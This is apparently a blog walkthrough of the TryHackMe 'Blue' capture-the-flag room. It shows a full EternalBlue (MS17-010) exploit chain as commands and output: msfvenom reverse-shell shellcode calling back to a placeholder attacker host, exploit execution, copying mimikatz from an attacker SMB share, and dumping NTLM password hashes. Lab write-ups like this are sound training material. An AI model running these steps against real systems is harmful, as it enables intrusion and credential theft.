This page looks best with JavaScript enabled

TryHackMe: Blue

 ·  ☕ 3 min read

As the title and image of the room suggest, it may be vulnerable to Eternal Blue (CVE-2017-0143). So let’s start by downloading a tool to exploit that vulnerability:

git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git

It also includes a script to check if the target is vulnerable so did that beforehand:

root@docker-desktop:~/Downloads/AutoBlue-MS17-010# python eternal_checker.py 10.10.49.80
[*] Target OS: Windows 7 Professional 7601 Service Pack 1
[!] The target is not patched
=== Testing named pipes ===
[*] Done

Once we know that the target is vulnerable, let’s create the shellcode payload:

root@docker-desktop:~/Downloads/AutoBlue-MS17-010/shellcode# ./shell_prep.sh
                 _.-;;-._
          '-..-'|   ||   |
          '-..-'|_.-;;-._|
          '-..-'|   ||   |
          '-..-'|_.-''-._|
Eternal Blue Windows Shellcode Compiler

Let's compile them windoos shellcodezzz

Compiling x64 kernel shellcode
Compiling x86 kernel shellcode
kernel shellcode compiled, would you like to auto generate a reverse shell with msfvenom? (Y/n)
y
LHOST for reverse connection:
<YOUR-IP>
LPORT you want x64 to listen on:
6464
LPORT you want x86 to listen on:
3232
Type 0 to generate a meterpreter shell or 1 to generate a regular cmd shell
1
Type 0 to generate a staged payload or 1 to generate a stageless payload
1
Generating x64 cmd shell (stageless)...

msfvenom -p windows/x64/shell_reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST=<YOUR-IP> LPORT=6464
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Saved as: sc_x64_msf.bin

Generating x86 cmd shell (stageless)...

msfvenom -p windows/shell_reverse_tcp -f raw -o sc_x86_msf.bin EXITFUNC=thread LHOST=<YOUR-IP> LPORT=3232
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Saved as: sc_x86_msf.bin

MERGING SHELLCODE WOOOO!!!
DONE

As we don’t know the architecture ran both of them so started with netcat a connection on port 3232 and 6464.
Then launched the exploit, which ended up giving a shell on the x64 arquitecture port:

root@docker-desktop:~/Downloads/AutoBlue-MS17-010# python eternalblue_exploit7.py 10.10.49.80 ./shellcode/sc_all.bin
shellcode size: 2203
numGroomConn: 13
Target OS: Windows 7 Professional 7601 Service Pack 1
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status: INVALID_PARAMETER
done

Keep in mind that this exploit may not work at the first time.

To get stored passwords let’s use mimikatz, so first start smbserver on our pc to pass the binary:

root@docker-desktop:/tmp/x64# smbserver.py shared .

After that we copy the file from the shared filesystem into the victim:

C:\Users\Public\Downloads>copy \\<YOUR-IP>\shared\mimikatz.exe .
copy \\<YOUR-IP>\shared\mimikatz.exe .
        1 file(s) copied.

Finally we use mimikatz to extract the passwords:

C:\Users\Public\Downloads>mimikatz.exe
mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 Jul 15 2020 16:10:52
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz # lsadump::sam
Domain : JON-PC
SysKey : 55bd17830e678f18a3110daf2c17d4c7
Local SID : S-1-5-21-2633577515-2458672280-487782642

SAMKey : c74ee832c5b6f4030dbbc7b51a011b1e

RID  : 000001f4 (500)
User : Administrator
  Hash NTLM: 31d6cfe0d16ae931b73c59d7e0c089c0

RID  : 000001f5 (501)
User : Guest

RID  : 000003e8 (1000)
User : Jon
  Hash NTLM: ffb43f0de35be4d9917ac0cc8ad57f8d

To crack the hash I used crackstation:
Crackstation

To end up we can find simply find the location of the flags:

C:\>dir /s /b flag*
dir /s /b flag*
C:\flag1.txt
C:\Users\Jon\AppData\Roaming\Microsoft\Windows\Recent\flag1.lnk
C:\Users\Jon\AppData\Roaming\Microsoft\Windows\Recent\flag2.lnk
C:\Users\Jon\AppData\Roaming\Microsoft\Windows\Recent\flag3.lnk
C:\Users\Jon\Documents\flag3.txt
C:\Windows\System32\config\flag2.txt
Share on
ITasahobby
WRITTEN BY
ITasahobby
InTernet lover

See Also

©2023, All Rights Reserved